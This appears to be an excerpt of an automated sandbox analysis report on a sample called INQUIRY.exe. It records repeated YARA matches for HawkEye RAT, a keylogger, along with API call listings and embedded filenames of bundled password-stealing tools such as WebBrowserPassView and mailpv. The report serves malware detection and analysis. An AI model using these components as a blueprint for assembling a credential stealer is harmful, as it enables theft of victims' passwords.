                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.828298688.0000000002E11000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875783315.0000000002717000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859116925.00000000007A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735055042.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858712668.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849214765.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919336144.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000020.00000002.875508614.0000000002682000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.735183511.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000001.871375197.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.736771009.00000000021E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000001.839775376.00000000004D2000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.858806395.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.863200098.0000000002DDA000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826009202.0000000002372000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.927425340.0000000002382000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000000D.00000002.757155287.00000000026F7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.924535204.00000000022F2000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001B.00000002.849044012.0000000002642000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.739090343.0000000002A41000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824784026.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000001.00000002.737371268.0000000002302000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.859836497.0000000002242000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.919755783.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000000.00000002.656369760.00000000026D7000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.826605147.0000000002492000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001C.00000002.860072694.00000000022F2000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000010.00000002.824923724.0000000000497000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000021.00000002.928494489.0000000002A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000016.00000002.820474176.0000000005470000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER7CAE.tmp.mdmp, type: DROPPEDMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 1.2.INQUIRY.exe.21e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 33.1.INQUIRY.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 28.2.INQUIRY.exe.7a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: Detects HawkEye RAT Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 16.2.INQUIRY.exe.22e0000.1.unpack, type: UNPACKEDPEMatched rule: detect HawkEye in memory Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004557F8 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0043A6DC NtdllDefWindowProc_A,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0042E904 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 1_2_00490159 NtCreateSection,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_004557F8 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00456024 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0044A3C8 GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0043A6DC NtdllDefWindowProc_A,GetCapture,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_0042E904 NtdllDefWindowProc_A,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 2_2_00455F74 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 6_2_00408836 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exe Code function: 0_2_0044FECC
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0040D426
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0040D523
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0041D5AE
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00417646
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0040D6C4
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_004429BE
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00446AF4
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0046ABFC
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00463C4D
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00463CBE
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0040ED03
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00463D2F
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00463DC0
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0040CF92
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0041AFA6
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0048F13D
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_00489976
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_004F9017
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_004F90A8
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_004A227A
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_004B028E
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 1_2_0043C7BC
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_0044A3C8
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_0046F74C
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_004759E0
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_0044FECC
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_00404DDB
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_0040BD8A
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_00404E4C
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_00404EBD
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_00404F4E
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00404419
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00404516
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00413538
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_004145A1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_0040E639
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_004337AF
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_004399B1
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_0043DAE7
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00405CF6
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00403F85
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00411F99
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 004035DC appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 00404348 appears 78 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 004039A8 appears 40 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413F8E appears 66 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00413E2D appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00442A90 appears 36 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 004141D6 appears 88 times
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: String function: 00411538 appears 35 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 004035DC appears 70 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 0040436C appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 004066E0 appears 32 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 0044BA9D appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 00403E24 appears 34 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 0040C2F0 appears 36 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 00404348 appears 156 times
                    Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: String function: 004039A8 appears 80 times
                    Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2308
                    Source: INQUIRY.exe | Static PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.656350929.00000000026C2000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000000.00000002.655979253.0000000002270000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe | Binary or memory string: OriginalFilename vs INQUIRY.exe
                    Source: INQUIRY.exe | Binary or memory string: OriginalFileName vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.737328211.00000000022F2000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000001.00000002.745763676.0000000007230000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000002.00000002.750595289.0000000002270000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.757044777.00000000026E2000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 0000000D.00000002.756074232.0000000002160000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameCMemoryExecute.dll@ vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameWebBrowserPassView.exeF vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamemailpv.exe< vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamePhulli.exe0 vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.832980202.0000000006970000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000010.00000002.825594692.0000000000852000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenamemscorwks.dllT vs INQUIRY.exe
                    Source: INQUIRY.exe, 00000011.00000002.836765666.0000000002160000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs INQUIRY.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | Section loaded: phoneinfo.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: phoneinfo.dll
                    Source: C:\Windows\SysWOW64\WerFault.exe | Section loaded: ext-ms-win-xblauth-console-l1.dll
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000001.00000002.737101791.0000000002272000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000021.00000002.923851920.0000000002210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 00000010.00000001.752146287.00000000004D2000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
